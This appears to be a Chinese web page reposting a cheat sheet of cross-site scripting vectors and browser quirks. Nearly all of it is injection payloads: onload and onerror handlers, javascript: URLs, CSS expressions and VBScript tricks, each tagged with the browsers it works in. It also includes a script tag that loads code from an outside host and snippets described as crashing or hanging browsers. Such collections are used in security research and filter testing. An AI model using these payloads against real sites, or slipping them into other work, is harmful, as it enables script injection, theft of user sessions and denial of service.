我要评论<script/onload=alert(1)></script> ie9
<style/onload=alert(1)>
alert([0x0d]-->[0x0d]1<!--[0x0d])
1<!--i
document.write('<img src="<iframe/onload=alert(1)>\0">'); ie8
json.parse('{"__proto__":["a",1]}')
location++
ie valid syntax: 我,啊=1,b=[我,啊],alert(我,啊)
alert('aaa\0bbb') ie only show aaa http://jsbin.com/emekog
<svg><animation xli:href="javascript:alert(1)"> based on h5sc#88 #opera
function('alert(arguments.callee.caller)')()
firefox dos? while(1)find();
<div/style=x:expression(alert(url=1))>
inject <meta http-equiv="x-ua-compatible" content="ie=emulateie7"> enabled css expression,breaking standard mode!
<applet code=javascript:alert('sgl')> and <embed src=javascript:alert('sgl')> umm...cute ff!
<math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome firefox opera vector
<svg><oooooo/oooooooooo/onload=alert(1) > works on webkit~
<body/onload=\\\vbs\\\::::::::alert+'x'+[000000]+'o'+'x'+[000000]::::::::>
vbs:alert+-[]
<body/onload=vbs::::::::alert----+--+----1:::::::::>
firefox vector <math><a xlink:href="//mmme.me">click
<svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script>
inj>> <script/src=//0.gg/xxxxx> << <script>...</script> less xss
[code]webkit x-xss-protection header is enabled just now :p
<svg/onload=domain=id> 22 letters e.g http://fiddle.jshell.net./kg7fr/5/show/
<?xml encoding="><svg/onload=alert(1)// >">
<a "<img/src=xxx:x onerror=alert(1) >x</a> distinctive ie
also <a `="<img/onerror=alert(1) src=xx:xx>'></h1>">x</a>
<h1 "='<img/onerror=alert(1) src=xx:xx>'></h1> ie only
<1h name="<svg/onload=alert(1)>"></1h>
<img ="1 src=xxx:x onerror=alert(1)//" > works in not-ie
javascript=1;for(javascript in runtimeobject());javascript=='javascript'
<body/onerror=alert(event)><img/src=javascript:throw[object.getownpropertynames(this)]> firefox sanbox object
<img src='javascript:while([{}]);'> works in firefox
for(x in document.open); crash your ie 6:>
localstorage.setitem('setitem',1)
only to find '?'.touppercase()==='?'.touppercase()
j? h? t? w? y? i? length==2
'?'.touppercase()=='i'
also '?'.touppercase()=='ss'
'?.touppercase() =='ff'// alike: ? fi ? fl ? ffi ? ffl ? st ? st
#opera data:text/html;base64,<<<<<<<<ph nj cmlwdd5hb我-勒-个-去gvyd cgxktwvc 2nyaxb0pg=>>>>>>>>>>
firefox always the most cute data:_,<script>alert(1)</script>
<a href="ftp:/baidu.com">xx</a>
http://?????????? works in firefox
regexp.prototype.valueof=alert,/-/-/-/;//ie,is there anything else?
location='javascript:alert(1)'
for({} in {});
興味深いhttp://jsbin.com/inekab for opera only
<a href=https:http://www.google.com>x</a> that's a relative path?
document.frames==window.frames
<a href="jar:xxx" id=x></a> x.protocol=='http:' on #firefox
(0).constructor.constructor=function(){alert(eval(arguments[0].substr(6)))} easy to decode jjencode and aaencode :d
127.0x000000001==127.0.0.1
<input value="sefewfewf"/> chrome input value block
<svg><xmp><img/onerror=alert(1) src=xxx:x />
<img src/="><img src=xxx:x onerror=alert(1)//">
有趣的isindex <isindex formaction=javascript:alert(1) type=submit >
chrome:xx - >chrome://crash/ crash?
<form action=javascript:alert(1) /><input> chrome input enter fucked!
<form/><button/><keygen/> chrome send empty key,is funny~_~
<form/><input/formaction=javascript:alert(1)> because <form> not a void element.[/code
[code]<form><input/name="isindex"> when name are isindex does not send key.
<form id=x ></form><button form=x formaction="javascript:alert(1)">x it like http://html5sec.org/#1 but only chrome support .
<script language="php">echo 1 ?> fascinating.
fvck:for(_?in?this)_['match'](/.element$/)&&console.log(_)
location.reload('javascript:alert(1)') //ie only,lol~
{}alert(1)
twitter @jackmasa =p
您可能感兴趣的文章:
如您对本文有疑问或者有任何想说的,请 点击进行留言回复,万千网友为您解惑!
网友评论